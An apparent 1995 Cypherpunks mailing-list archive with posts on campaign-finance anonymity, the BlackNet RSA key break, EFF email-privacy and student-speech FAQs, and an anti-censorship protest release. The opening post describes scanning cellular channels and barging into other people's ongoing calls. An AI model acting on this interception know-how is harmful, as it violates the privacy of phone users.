>That just refers to the fact that it is no longer legal to sell >scanners that can listen in to that range. I havn't seen any scanners that block the 900 MHz range. Didn't think they were blocking that. There isn't any reason to. After all they don't block the 49 MHz. >(BTW, a couple of years ago Nuts & Volts ran >an article with information on a program and some toys that let >a laptop computer, properly wired into a cell phone, act as a >cell scanner. Never did wire it up, but it looked like fun ;) > Most cellular phone like the Motorola and the NEC can scan cellular channels. Whats neat is that they require little or no modification. They can scan through all cellular channels including control, pause on a channel that has audio, and should signal level. I've use the Novatel and Motorola phones to even force the transmit on my phone on a channel that was already in conversation and create a three way call. Since the cellular system already proccessed the original MIN and ESN of the calling party my ESN is never checked. All of this without modifying my phone internaly or adding a computer. This type of stuff makes encryption needed. More and more people are using PCMCIA cellular modems for all kinds of transaction not realizing that anyone can pretty much intercept and use that information. Digital will help in some ways but harm on others. $49 bucks will buy you an upconverter that will enable any scanner that can pick up the 400 MHz range to pickup cellular. Dr0id From bdavis at thepoint.net Mon Dec 18 11:10:31 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 19 Dec 1995 03:10:31 +0800 Subject: Political Cleanup program In-Reply-To: <199512180430.UAA02707@blob.best.net> Message-ID: On Sun, 17 Dec 1995, James A. Donald wrote: > At 11:04 AM 12/17/95 -0800, jim bell wrote: > > It occurs to me that it would be a major advance if a system could be set up > > that would "blind" campaign donations as to their source: The donor could > > be satisfied that his donation gets to the candidate or cause, but the > > candidate couldn't know who actually paid the money > See my earlier post. > To make this work, the government would need to prohibit individuals > from campaigning for politicians, taking out ads with political > consequences, and so on and so forth. A short step from > totalitarianism Not to mention the death of the First Amendment. Which, under your scenario, would probably mean the death (or curtailment) of Cypherpunks. > A better solution is to move assets and money into forms where > politicians cannot get at them, thus reducing the power of politicians, > and thus the incentive to buy favors from them. I'm not sure what you mean here: are politicians to be prohibited from campaigning (which cost money)? And if politicians, who generally take the form of human beings, can't get at $$$, how can you or I? > of animals that we are. True law | James A. Donald > arbitrary power of the state. | jamesd at echeque.com > > EBD From reh at wam.umd.edu Mon Dec 18 11:31:20 1995 From: reh at wam.umd.edu (Richard Huddleston) Date: Tue, 19 Dec 1995 03:31:20 +0800 Subject: Political Cleanup program Message-ID: <199512181412.JAA08672@exp2.wam.umd.edu> Detweiler wrote: * >JB: * >>Politics is traditionally corrupt, it appears, because donors to politicians * >>and political campaigns expect a quid pro quo for their donations. Various * >>unsatisfactory solutions include campaign spending limits, etc. * > * >I have an unusual view that I've never seen elsewhere: the problem with * >our government is not that money or PACs are involved, but that the system * >does not handle or resolve the conflicts between them very well. in other * >words, in contrary to the current view that all PACs are evil, I think the * >problem is not that we have PACs, but that our current system does not * >balance their demands in some sensible manner. the system is * >susceptible to corruption. it is conceivable however that there would be * >a system that involves money and politics but still avoids corruption. Not to sound like a dupe or anything, but every time I get discouraged at the rampant mealyism of our political system I go read the first couple of paragraphs of a text from GOVT 101. There, I get reminded that the way most political debate is handled elsewhere is with bullets. Personally, I welcome a complete equity between all lobbyists seeking to obtain a politico's ear. Take the money out of the equation, and let the merits of their causes, if any, stand on their own. Happy holidays, Richard From jcorgan at aeinet.com Mon Dec 18 11:35:21 1995 From: jcorgan at aeinet.com (Johnathan Corgan) Date: Tue, 19 Dec 1995 03:35:21 +0800 Subject: Political Cleanup program Message-ID: <199512181833.KAA13146@scruz.net> At 11:11 AM 12/18/95 -0500, Duncan Frissell wrote: >At 10:35 AM 12/18/95 -0500, Brian Davis wrote: > >>> A better solution is to move assets and money into forms where >>> politicians cannot get at them, thus reducing the power of politicians, >>> and thus the incentive to buy favors from them. >> >>I'm not sure what you mean here: are politicians to be prohibited from >>campaigning (which cost money)? And if politicians, who generally take >>the form of human beings, can't get at $$$, how can you or I? > >Brian, the above means cut the power and the purse of politicians so they >have nothing to sell to contributors so no contributors will buy. Yep. If politicians didn't have capricious, arbitrary, and absolute power over individuals and businesses, there would be no market for influence peddling. From tcmay at got.net Mon Dec 18 12:15:02 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Dec 1995 04:15:02 +0800 Subject: What ever happened to... Cray Comp/NSA co-development Message-ID: At 5:50 AM 12/18/95, Jim Gillogly wrote: >Correction of one detail: > >> tcmay at got.net (Timothy C. May) writes: >> When you've done this, and concluded that RSA-129 could be done in, say, X >> minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT >> group), and on to the 1024- and 2048-bit keys. Tell us how many years or >> centuries it will take. (Hint: Rivest and Schneier have done these > >The BlackNet key break didn't have any MIT involvement: it was done by >Paul Leyland of Oxford, Arjen Lenstra of Bellcore, Alec Muffet of Sun UK, >and Jim Gillogly of Cypherpunks, RAND, and Gillogly Software in no >particular order. > Sorry, Jim. I thought that Derek Atkins was involved, which led to thinking it was MIT. Now that you've reminded me, some of the details are beginning to come back. (I knew that someone from our list was involved....) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From kadie at eff.org Mon Dec 18 12:23:33 1995 From: kadie at eff.org (Carl M. Kadie) Date: Tue, 19 Dec 1995 04:23:33 +0800 Subject: Oklahoma University: Is this legal?... In-Reply-To: Message-ID: <199512181751.JAA07443@eff.org> No state law does or could prempt the 5th Amendment, the ECPA, or the FERPA. Moreover, the one state FOIA (Illinois') I've read in detail *doesn't* even try to do this. I'm enclosing two FAQ's. The first is about email privacy. The second is about student media. I also suggest sending email to marsha-w at uiuc.edu (Marsha Woodbury) she is an expert in the application of FOIA laws to universities and a CPSR officer. - Carl Carl Kadie -- I do not represent EFF or my employer; this is just me. =Email: kadie at eff.org, kadie at cs.uiuc.edu = =URL: , = =============== ftp://ftp.eff.org/pub/CAF/faq/email.privacy =============== q: Can (should) my university monitor my email? a: Ethically (and perhaps legally) email communications should have the same privacy protection as telephone calls. It would be unwise for any university employee to tap email communications without authorization from the university president, university legal counsel, and the academic freedom committee. According to Mike Godwin, legal services counsel for the Electronic Frontier Foundation (EFF), the U.S.'s Electronic Communications Privacy Act (ECPA) could be reasonably construed to protect university email. This is also the reported opinion of the U. of Michigan's lawers. Also, the U.S.'s Family Educational Rights and Privacy Act gives students at all public and most private schools some privacy rights. A U.S. government task force says that "[Email] monitoring [of government employees] of actual communications and communicators may impinge on the Constitutional rights of freedom of speech (1st Amendment), against unreasonable search and seizure (4th Amendment), and against self-incrimination (5th amendment), as well as on the right to privacy, specifically as set forth in both the Privacy Act and the ECPA." In the context of libraries, the American Library Association's Policy on Confidentiality of Library Records suggests this procedure to deal with an official or police request for information about users: 'When drafting local policies, libraries should consult with their legal counsel to insure these policies are based upon and consistent with applicable federal, state, and local law concerning the confidentiality of library records, the disclosure of public records, and the protection of individual privacy. Suggested procedures include the following: 1. The library staff member receiving the request to examine or obtain information relating to circulation or other records identifying the names of library users, will immediately refer the person making the request to the responsible officer of the institution, who shall explain the confidentiality policy. 2. The director, upon receipt of such process, order, or subpoena, shall consult with the appropriate legal officer assigned to the institution to determine if such process, order, or subpoena is in good form and if there is a showing of good cause for its issuance. 3. If the process, order, or subpoena is not in proper form or if good cause has not been shown, insistence shall be made that such defects be cured before any records are released. (The legal process requiring the production of circulation or other library records shall ordinarily be in the form of subpoena "duces tecum" [bring your records] requiring the responsible officer to attend court or the taking of his/her deposition and may require him/her to bring along certain designated circulation or other specified records.) 4. Any threats or unauthorized demands (i.e., those not supported by a process, order, or subpoena) concerning circulation and other records identifying the names of library users shall be reported to the appropriate legal officer of the institution. 5. Any problems relating to the privacy of circulation and other records identifying the names of library users which are not provided for above shall be referred to the responsible officer.' - Carl M. Kadie ANNOTATED REFERENCES (All these documents are available on-line. Access information follows.) ================= law/ecpa.1986.godwin ================= * Privacy -- E-mail -- ECPA - University Site Mike Godwin, legal services counsel for the Electronic Frontier Foundation (EFF), says that the Electronic Communications Privacy Act (ECPA) could be reasonably construed to protect university email. ================= law/ferpa.text ================= * Privacy -- Students -- FERPA (Buckley Ammendment) The full text of the Family Educational Right to Privacy Act (Buckley Amendment). ================= faq/email.policies ================= * Email -- Policies q: Do any universities treat email and computer files as private? a: Yes, many universities treat email and computer files as private. ... ================= library/confidentiality.1.ala ================= * Confidentiality -- 1 (ALA) The American Library Association's "Policy on Confidentiality of Library Records" Suggests how to handle police or official requests for information about a user. ================= library/computer.draft.ala ================= * DRAFT: Access to Electronic ... Services and Networks ... (ALA) A draft interpretation by the American Library Association of the "Library Bill of Rights" Says in part: "Libraries and librarians exist to facilitate [freedom of speech and freedom to read] by providing access to, identifying, retrieving, organizing, and preserving recorded expression regardless of the formats or technologies in which that expression is recorded." ================= statements/bill-of-rights.aahe ================= * Bill of Rights ... for Electronic ... Learners This is the "Bill of Rights and Responsibilities for the Electronic Community of Learners". It could become the first widely endorsed statement directly related to computers and academic freedom. ================= statements/caf-statement ================= * Computer and Academic Freedom Statement -- Draft This is an attempt to codify the application of academic freedom to academic computers. It reflects our seven months of on-line discussion about computers and academic freedom. It covers free expression, due process, privacy, and user participation. Comments and suggestions are very welcome (especially when posted to CAF-talk). All the documents referenced are available on-line. (Critiqued). ================= statements/caf-statement.critique ================= * Computer and Academic Freedom Statement -- Draft -- Critique This is a critique of an attempt to codify the application of academic freedom to academic computers. It reflects our seven months of on-line discussion about computers and academic freedom. It covers free expression, due process, privacy, and user participation. Additional comments and suggestions are very welcome (especially when posted to CAF-talk). All the documents referenced are available on-line. ================= academic/student.freedoms.aaup ================= * Student Freedoms (AAUP) Joint Statement on Rights and Freedoms of Students -- This is the main U.S. statement on student academic freedom. ================= academic/speech-codes.aaup ================= * Speech Codes (AAUP) On Freedom of Expression and Campus Speech Codes Expression - An official statement of the American Association of University Professors (AAUP) It says in part: "On a campus that is free and open, no idea can be banned or forbidden. No viewpoint or message may be deemed so hateful or disturbing that it may not be expressed." ================= law/uwm-post-v-u-of-wisconsin ================= * Expression -- Hate Speech -- UWM Post v. U Of Wisconsin The full text of UWM POST v. U. of Wisconsin. This recent district court ruling goes into detail about the difference between protected offensive expression and illegal harassment. It even mentions email. It concludes: "The founding fathers of this nation produced a remarkable document in the Constitution but it was ratified only with the promise of the Bill of Rights. The First Amendment is central to our concept of freedom. The God-given "unalienable rights" that the infant nation rallied to in the Declaration of Independence can be preserved only if their application is rigorously analyzed. The problems of bigotry and discrimination sought to be addressed here are real and truly corrosive of the educational environment. But freedom of speech is almost absolute in our land and the only restriction the fighting words doctrine can abide is that based on the fear of violent reaction. Content-based prohibitions such as that in the UW Rule, however well intended, simply cannot survive the screening which our Constitution demands." ================= law/gillard-v-schmidt ================= * Privacy -- School -- Staff Desk -- Gillard v. Schmidt Description of an appellate court ruling that the school board could not search the desk of a school counselor without a warrant. ================= law/email.gov-employee ================= * Privacy -- E-mail -- Government Employees A U.S. government task force: "[Email] monitoring [of government employees] of actual communications and communicators may impinge on the Constitutional rights of freedom of speech (1st Amendment), against unreasonable search and seizure (4th Amendment), and against self-incrimination (5th amendment), as well as on the right to privacy, specifically as set forth in both the Privacy Act and the ECPA." Enclosed are guidelines for legitimate monitoring of government employee email. ================= law/mass-student-searches ================= * Privacy -- Mass Students Searches An excerpt from The ACLU Handbook: _The Rights of Students_, stating that "there must a reasonable suspicion directed specifically at each student before a school official can search students." ================= law/constraints.constitutional ================= * Constitution -- Public University -- Constraints Comments from _A Practical Guide to Legal Issues Affecting College Teachers_ by Partrica A. Hollander, D. Parker Young, and Donald D. Gehring. (College Administration Publication, 1985). Discusses the constitutional constraints on public universities including the requires for freedom of expression, freedom against unreasonable searches and seizures, due process, specific rules. ================= law/ecpa.umich ================= * Privacy -- E-mail -- ECPA - University Site A summary of a newspaper report that the U. of Michigan's lawyers believe(d) that the institution is barred under the federal Electronic Communications Privacy Act from reading electronic mail. ================= law/privacy.email ================= * Privacy -- E-mail -- Law -- Hernandez "Computer Electronic Mail and Privacy", an edited version of a law school seminar paper by Ruel T. Hernandez. ================= law/privacy.workplace ================= * Privacy -- Workplace Comments from and about _The new hazards of the high technology workplace_ see (1991) 104 _Harvard Law Review_ 1898. Talks about email and other electronic monitoring. ================= law/email.bib ================= * Privacy -- E-mail -- Bibliography I have been having an e-mail conversation with Stacy Veeder for several days on the topic of e-mail privacy. She mailed me this bibliography which she has compiled for two papers which she is currently writing. I post it here with permission. PS - She is interested in talking with anyone who has some views on the topic/information to share. Mark N. ================= ================= If you have gopher, you can browse the CAF archive with the command gopher gopher.eff.org These document(s) are also available by anonymous ftp (the preferred method) and by email. To get the file(s) via ftp, do an anonymous ftp to ftp.eff.org, and then: cd /pub/CAF/law get ecpa.1986.godwin cd /pub/CAF/law get ferpa.text cd /pub/CAF/faq get email.policies cd /pub/CAF/library get confidentiality.1.ala cd /pub/CAF/library get computer.draft.ala cd /pub/CAF/statements get bill-of-rights.aahe cd /pub/CAF/statements get caf-statement cd /pub/CAF/statements get caf-statement.critique cd /pub/CAF/academic get student.freedoms.aaup cd /pub/CAF/academic get speech-codes.aaup cd /pub/CAF/law get uwm-post-v-u-of-wisconsin cd /pub/CAF/law get gillard-v-schmidt cd /pub/CAF/law get email.gov-employee cd /pub/CAF/law get mass-student-searches cd /pub/CAF/law get constraints.constitutional cd /pub/CAF/law get ecpa.umich cd /pub/CAF/law get privacy.email cd /pub/CAF/law get privacy.workplace cd /pub/CAF/law get email.bib To get the file(s) by email, send email to ftpmail at decwrl.dec.com Include the line(s): connect ftp.eff.org cd /pub/CAF/law get ecpa.1986.godwin cd /pub/CAF/law get ferpa.text cd /pub/CAF/faq get email.policies cd /pub/CAF/library get confidentiality.1.ala cd /pub/CAF/library get computer.draft.ala cd /pub/CAF/statements get bill-of-rights.aahe cd /pub/CAF/statements get caf-statement cd /pub/CAF/statements get caf-statement.critique cd /pub/CAF/academic get student.freedoms.aaup cd /pub/CAF/academic get speech-codes.aaup cd /pub/CAF/law get uwm-post-v-u-of-wisconsin cd /pub/CAF/law get gillard-v-schmidt cd /pub/CAF/law get email.gov-employee cd /pub/CAF/law get mass-student-searches cd /pub/CAF/law get constraints.constitutional cd /pub/CAF/law get ecpa.umich cd /pub/CAF/law get privacy.email cd /pub/CAF/law get privacy.workplace cd /pub/CAF/law get email.bib =============== ftp://ftp.eff.org/pub/CAF/faq/netnews.writing =============== q: Should my university allow students to post to Netnews or have Web pages? a: Yes. Free inquiry and free expression are an important part of a university's mission. Most universities encourage and support student expression and publication. Most universities also seem to give full network access to all users, even students. (This conclusion is based on an informal survey posted to comp.admin.policy in October, 1991. [cafv01n33]) There is probably no need to create special rules for student computer media; your university likely already has rules for student media. (Look in your Student Code.) In the U.S., most student publications are free of university screening, censorship, and most retaliation. (For state universities, this is a legal requirement.) At the same time, most universities disclaim responsibility for student publications, even when the university "owns the presses." The American Library Association's draft policy recommendation on electronic services and networks says (in part): No user should be restricted or denied access for expressing or receiving constitutionally protected speech. No user's access should be changed without due process, including, but not limited to, notice and a means of appeal. - Carl ANNOTATED REFERENCES (All these documents are available on-line. Access information follows.) ================= library/computer.draft.ala ================= * DRAFT: Access to Electronic ... Services and Networks ... (ALA) A draft interpretation by the American Library Association of the "Library Bill of Rights" Says in part: "Libraries and librarians exist to facilitate [freedom of speech and freedom to read] by providing access to, identifying, retrieving, organizing, and preserving recorded expression regardless of the formats or technologies in which that expression is recorded." ================= statements/caf-statement ================= * Computer and Academic Freedom Statement -- Draft This is an attempt to codify the application of academic freedom to academic computers. It reflects our seven months of on-line discussion about computers and academic freedom. It covers free expression, due process, privacy, and user participation. Comments and suggestions are very welcome (especially when posted to CAF-talk). All the documents referenced are available on-line. (Critiqued). ================= statements/caf-statement.critique ================= * Computer and Academic Freedom Statement -- Draft -- Critique This is a critique of an attempt to codify the application of academic freedom to academic computers. It reflects our seven months of on-line discussion about computers and academic freedom. It covers free expression, due process, privacy, and user participation. Additional comments and suggestions are very welcome (especially when posted to CAF-talk). All the documents referenced are available on-line. ================= statements/bill-of-rights.aahe ================= * Bill of Rights ... for Electronic ... Learners This is the "Bill of Rights and Responsibilities for the Electronic Community of Learners". It could become the first widely endorsed statement directly related to computers and academic freedom. ================= academic/student.freedoms.aaup ================= * Student Freedoms (AAUP) Joint Statement on Rights and Freedoms of Students -- This is the main U.S. statement on student academic freedom. ================= academic/speech-codes.aaup ================= * Speech Codes (AAUP) On Freedom of Expression and Campus Speech Codes Expression - An official statement of the American Association of University Professors (AAUP) It says in part: "On a campus that is free and open, no idea can be banned or forbidden. No viewpoint or message may be deemed so hateful or disturbing that it may not be expressed." ================= academic/academic-freedom.wus ================= * Academic Freedom (WUS) The Lima Declaration on Academic Freedom and Autonomy of Institutions of Higher Education, an international declaration by the World University Service. Source: _World University Service Academic Freedom 1990: A Human Rights Report_ by Laksiri Fernando, et al. ================= academic/academic-freedom.can ================= * CAUT-ACPU Policy on Academic Freedom (Canada) Policy statement on academic freedom for the Canadian Association of University Teachers. ================= policies/netnews.uwm.edu ================= * Edu -- U. of Wisconsin-Milwaukee -- Netnews These are the network policy resolutions developed by the Computer Policy Committee at the University of Wisconsin-Milwaukee. The resolutions were approved by the Committee and forwarded to the Chancellor. They were given final approval by the Chancellor as campus administrative policy (memo dated 02/23/93). They say (to paraphrase) 1) Netnews is important 2) No restrictions should be imposed without wide consultation 3) The principles of intellectual freedom developed for university libraries apply to Netnews material 4) The principles of intellectual freedom developed for publication in traditional media apply to computer media. ================= policies/netnews.uwo.ca ================= * U. of Western Ontario -- Netnews policy It says in part: "In its publications regarding Usenet, CCS should make it clear that the individual user bears the primary responsibility for the material that he or she chooses to send or display on the network or on the University's computer systems." It also specifies a procedure for dealing with challenges to material. ================= news/cafv01n33 ================= [No annotation available.] ================= faq/netnews.reading ================= * Netnews -- Policies on What Users Read q: Should my university remove (or restrict) Netnews newsgroups because some people find them offensive? If it doesn't have the resources to carry all newsgroups, how should newsgroups be selected? a: Material should not be restricted just because it is offensive to ... ================= faq/media.control ================= * University Control of Media q: Since freedom of the press belongs to those who own presses, a public university can do anything it wants with the media that it owns, right? a: No. Like any organization, the U.S. government must work within its ... ================= law/rosenberger_v_u_virginia ================= * Expression -- Public Forum -- Rosenberger v. U. of Virginia A 1995 U.S. Supreme Court decision that says that it is illegal for a state univeristy to deny funds to a student newspaper on the grounds that the newspaper is religious. The decision confirms that the government cannot discriminate on the basis of viewpoint in (government-owned)limited public forums. ================= law/san-diego-committee-v-gov-bd ================= * Expression -- Public Forum -- Overview -- San Diego Committee v. Gov Bd Excerpts from San Diego Committee v. Governing Bd., 790 F.2d 1471. A decision by an appellate court that applied the Supreme Court's Public Forum Doctrine (to a school newspaper). ================= law/stanley-v-magrath ================= * Expression -- Public Forum -- Closing -- Stanley v. Magrath Comments from _Public Schools Law: Teachers' and Students' Rights_ 2nd Ed. by Martha M. McCarthy and Nelda H. Cambron-McCabe, published in 1987 by Allyn and Bacon, Inc. It says, in part, "[a]lthough school boards are not obligated to support student papers, if a given publication was originally created as a free speech forum, removal of financial or other school board support can be construed as an unlawful effort to stifle free expression." Also, "school authorities cannot withdraw support from a student publication simply because of displeasure with the content" and "the content of a school-sponsored paper that is established as a medium for student expression cannot be regulated more closely than a nonsponsored paper". Also, it tells what to do about libel in student publications. ================= law/student-publications.misc ================= * Expression -- Offensive -- Student Publications -- Misc Quotes from the book _Law of the Student Press_ by the Student Press Law Center (1985,1988). They say that four-letter words are protected speech, that public universities are not likely to be liable for publications that they for which they do not control the contents, and that the _Hazelwood_ decision does not apply to universities. ================= law/uwm-post-v-u-of-wisconsin ================= * Expression -- Hate Speech -- UWM Post v. U Of Wisconsin The full text of UWM POST v. U. of Wisconsin. This recent district court ruling goes into detail about the difference between protected offensive expression and illegal harassment. It even mentions email. It concludes: "The founding fathers of this nation produced a remarkable document in the Constitution but it was ratified only with the promise of the Bill of Rights. The First Amendment is central to our concept of freedom. The God-given "unalienable rights" that the infant nation rallied to in the Declaration of Independence can be preserved only if their application is rigorously analyzed. The problems of bigotry and discrimination sought to be addressed here are real and truly corrosive of the educational environment. But freedom of speech is almost absolute in our land and the only restriction the fighting words doctrine can abide is that based on the fear of violent reaction. Content-based prohibitions such as that in the UW Rule, however well intended, simply cannot survive the screening which our Constitution demands." ================= law/rust-v-sullivan ================= * Expression -- Gag Rule -- Rust v. Sullivan The decision and decent for the so-called abortion information gag rule case. The decision explicitly mentions universities as a place where free expression is so important that gag rules would not be allowed. ================= law/rav-v-st-paul.1 ================= * Expression -- Hate Speech -- RAV v. St Paul -- 1 The Supreme Court's _R.A.V. v. City of St. Paul_ decision about hate crimes. The Court overturned St. Paul's Bias-Motivated Crime Ordinance, which prohibits the display of a symbol which one knows or has reason to know "arouses anger, alarm or resentment in others on the basis of race, color, creed, religion or gender." By 9-0, the Court said the law as overly broad. By 5-4, the Court said that the law was also unfairly selective because it only tried to protect some groups. Included: summary, majority opinion, 3 concurring opinions. ================= law/perry-v-perry ================= * Expression -- Public Forum -- Campus Mail -- Perry v. Perry Comments from the ACLU Handbook _The Rights of _Teachers_. It says that campus mail systems (and other school facilities) may or may not be limited public forums depending on how they are managed. (Perry v. Perry was about an interschool mail system that was managed as a nonpublic forum. It was one of the cases that defined the Public Forum Doctrine.) Also, a paraphrase from an ACLU handbook _The Rights of Teachers_. It says that generally, speech, if otherwise shielded from punishment by the First Amendment, does not lose that protection because its tone is sharp. Also, from p. 92, it says that there are legal limits to the oaths a (public) school can ask its teachers to sign. [Some of these same limits might apply to what a school can ask a user to sign as a condition of getting (or keeping) a computer account.] ================= law/broadrick-v-oklahoma ================= * Expression -- Vague Regulation -- Broadrick v. Oklahoma, et al. Summary of case law on overly vague regulation of expression. It says a statute is unconstitutionally vague when "men of common intelligence must necessarily guess at its meaning." ================= law/naacp-v-button ================= * Expression -- Overbroad Regulation -- NAACP v. Button, et al. Summary of case law on overly broad regulation of expression. It says "[b]ecause First Amendment freedoms need breathing space to survive, government may regulate in the area only with narrow specificity." ================= law/pd-of-chicago-v-mosley ================= * Expression -- Content Regulation -- Police Department of Chicago v. Mosley Summary of case law on content-based regulation of expression. It says that "above all else, the First Amendment means that government has no power to restrict expression because of its message, its ideas, its subject matter, or its content." ================= law/cohen-v-california.4 ================= * Expression -- Regulation of Tone -- Cohen v. California -- 4 A short quote from _Cohen v. California_: "We cannot sanction the view that the constitution, while solicitous of the cognitive content of individual speech, has little or no regard for that emotive function which, practically speaking, may often be the more important element of the overall message sought to be communicated." ================= ================= If you have gopher, you can browse the CAF archive with the command gopher gopher.eff.org These document(s) are also available by anonymous ftp (the preferred method) and by email. To get the file(s) via ftp, do an anonymous ftp to ftp.eff.org, and then: cd /pub/CAF/library get computer.draft.ala cd /pub/CAF/statements get caf-statement cd /pub/CAF/statements get caf-statement.critique cd /pub/CAF/statements get bill-of-rights.aahe cd /pub/CAF/academic get student.freedoms.aaup cd /pub/CAF/academic get speech-codes.aaup cd /pub/CAF/academic get academic-freedom.wus cd /pub/CAF/academic get academic-freedom.can cd /pub/CAF/policies get netnews.uwm.edu cd /pub/CAF/policies get netnews.uwo.ca cd /pub/CAF/news get cafv01n33 cd /pub/CAF/faq get netnews.reading cd /pub/CAF/faq get media.control cd /pub/CAF/law get rosenberger_v_u_virginia cd /pub/CAF/law get san-diego-committee-v-gov-bd cd /pub/CAF/law get stanley-v-magrath cd /pub/CAF/law get student-publications.misc cd /pub/CAF/law get uwm-post-v-u-of-wisconsin cd /pub/CAF/law get rust-v-sullivan cd /pub/CAF/law get rav-v-st-paul.1 cd /pub/CAF/law get perry-v-perry cd /pub/CAF/law get broadrick-v-oklahoma cd /pub/CAF/law get naacp-v-button cd /pub/CAF/law get pd-of-chicago-v-mosley cd /pub/CAF/law get cohen-v-california.4 To get the file(s) by email, send email to ftpmail at decwrl.dec.com Include the line(s): connect ftp.eff.org cd /pub/CAF/library get computer.draft.ala cd /pub/CAF/statements get caf-statement cd /pub/CAF/statements get caf-statement.critique cd /pub/CAF/statements get bill-of-rights.aahe cd /pub/CAF/academic get student.freedoms.aaup cd /pub/CAF/academic get speech-codes.aaup cd /pub/CAF/academic get academic-freedom.wus cd /pub/CAF/academic get academic-freedom.can cd /pub/CAF/policies get netnews.uwm.edu cd /pub/CAF/policies get netnews.uwo.ca cd /pub/CAF/news get cafv01n33 cd /pub/CAF/faq get netnews.reading cd /pub/CAF/faq get media.control cd /pub/CAF/law get rosenberger_v_u_virginia cd /pub/CAF/law get san-diego-committee-v-gov-bd cd /pub/CAF/law get stanley-v-magrath cd /pub/CAF/law get student-publications.misc cd /pub/CAF/law get uwm-post-v-u-of-wisconsin cd /pub/CAF/law get rust-v-sullivan cd /pub/CAF/law get rav-v-st-paul.1 cd /pub/CAF/law get perry-v-perry cd /pub/CAF/law get broadrick-v-oklahoma cd /pub/CAF/law get naacp-v-button cd /pub/CAF/law get pd-of-chicago-v-mosley cd /pub/CAF/law get cohen-v-california.4 From hallam at w3.org Mon Dec 18 13:03:22 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 19 Dec 1995 05:03:22 +0800 Subject: Political Cleanup program In-Reply-To: Message-ID: <9512181620.AA10316@zorch.w3.org> The main problem with anonymous political donations is that it is easy enough to create linkage if the recipient and the donor conspire together. There are many other things that campaign laws are intended to achieve beyond avoiding bribery. For example foreign nationals cannot make donations to US parties. It would be a good thing if there were similar laws in the UK since at the last election a foreign national with links to organised crime alledghedly made a multi million donation to the Conservative party. Of course in the absence of full disclosure of details of party records nobody can be sure. We are as voters entitled to consider the worst however. Similarly it would be bad if a politician could obtain huge sums of money simply by espousing causes backed by lartge sums of cash. A candidate that proposed making large federal donnations to the arms industry (codeword "Strong defence") might expect substantially more donations than one who proposed a reversal of this policy. Similarly candidates supporting private prisons might expect funds from the likely beneficiaries and so on. The starting point for campaign reform has to be to cap the amount that can be spent on a campaign. Most countries have such laws to prevent the political process from being owned by the rich. Unfortunately this has happened in the US with the effect that both parties are much further to the right than in any other Western democracy. Phill From rah at shipwright.com Mon Dec 18 13:07:25 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 19 Dec 1995 05:07:25 +0800 Subject: Fwd: Results of Internet Protest Message-ID: --- begin forwarded text Date: Mon, 18 Dec 1995 11:16:31 -0500 Subject: Fwd: Results of Internet Protest From: Joel Bowers Mime-Version: 1.0 Apparently-To: Subject: Results of Internet Protest Sent: 12/18 2:06 AM Received: 12/18 8:18 AM From: mcnmembers at macn.com To: MCNMembers at macn.com From: mcnmembers at macn.com (MCN Members) Sender: jfried at desktopdesign.com (John Friedlander) To: MCNMembers at macn.com (MCN Members) ======================================================================== CAMPAIGN TO STOP THE NET CENSORSHIP LEGISLATION IN CONGRESS THE NET ROCKS AMERICA'S CAPITOL - NEARLY 20,000 PARTICIPANTS THURSDAY DECEMBER 14, 1995 SENATE CONFEREES COULD STILL VOTE THIS WEEK RALLIES HAPPENING IN AUSTIN, NEW YORK, SF, & SEATTLE PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT REDISTRIBUTE ONLY UNTIL December 25, 1995 ________________________________________________________________________ RECAP: INTERNET DAY OF PROTEST: TUESDAY DECEMBER 12, 1995 The net came into its own as a political force on Tuesday. The press release has more details. If you haven't taken a moment to call, fax, or email, do so now. We're still keeping track and only need a few more to break 20,000. VTW had someone onhand in DC monitoring the response at the Congressional offices. The feedback was amazing; Congress got the message. We need to sustain that by continuing to tell them we're not happy with the options being offered to us at this time. Directions for calling Congress can still be found at http://www.vtw.org/ and the many other sites listed at the end of this message. Take a moment to call! Don't forget to mail us a note at protest at vtw.org to let us know you took part in the Day Of Protest (and Day 2, and Day 3, and Day 4). FOR IMMEDIATE RELEASE December 13, 1995 Contact: Steven Cherry (718) 596-2851 stc at vtw.org Shabbir Safdar (718) 596-2851 shabbir at vtw.org New York, NY Are 20,000 phone calls a lot? 30,000? 50,000? They are if you're one of a handful of Congressional staffers trying to field them. Tuesday, December 12th was the Internet's Day of Protest. A variety of net-activists and telecommunications-related services exhorted the on-line community to call a selected group of Senators and Representatives to declare their opposition to the threat of Internet censorship. And call they did. As the Senate members of the Telecommunications Reform conference committee contemplated portions of legislation that would censor "indecent" material on-line, their staffers were being overwhelmed with phone calls. Senator Inouye's office said they were "getting lots and lots of calls and faxes." Senator Lott's said they were "flooded with calls." At Senator Stevens' office there were so many calls they couldn't keep a complete tally. At Senator Exon's office, the fax machine was "backed up." And at one point, activists couldn't even get through to Senator Gorton's office to ask. Exon is the Senator whose Communications Decency Act started the nearly year-long struggle between those who would create special regulations to restrict speech on-line (even, in certain instances, private email between two individuals) to a greater extent than even traditional broadcast media; regulations that, according to the ACLU and many other civil liberties groups, will certainly be proven to be unconstitutional if passed into law. "We've never seen anything like it," said Stanton McCandish of the Electronic Frontier Foundation (EFF). The EFF is one member of the on-line coalition that has been fighting an array of censorship legislation since this spring, when Senator Exon introduced his Communications Decency Act. "We may have almost overwhelmed our provider," said Shabbir Safdar, head of Voter's Telecommunications Watch (VTW). VTW is the organization that organized the on-line coalition. Their on-line connectivity is provided by Panix.com, a New York-area Internet service provider. "Panix has been doing some maintenance work today, so it's hard to tell," Safdar continued. "But we think it's actually made a dent in their connection to the rest of the Net." How many calls were actually made? No one can tell. For Leslie Miller, a reporter for USA Today, it took much of the afternoon to get some counts from Congressional staffers, and she couldn't get any report from the Senate's Sergeant-At-Arms, the office nominally responsible for the Senate's telephone system. VTW may be the only organization that can really make an educated guess. "In our Alerts we ask that people drop us an email note after they call," explained VTW board member Steven Cherry. "The message count peaked in the late afternoon at over 70 per minute. Many of those were from people who called several offices. By 7:30 P.M. (EST) we had gotten 14,000 messages. By Wednesday morning the count was over 18,000. And of course there are the people who called 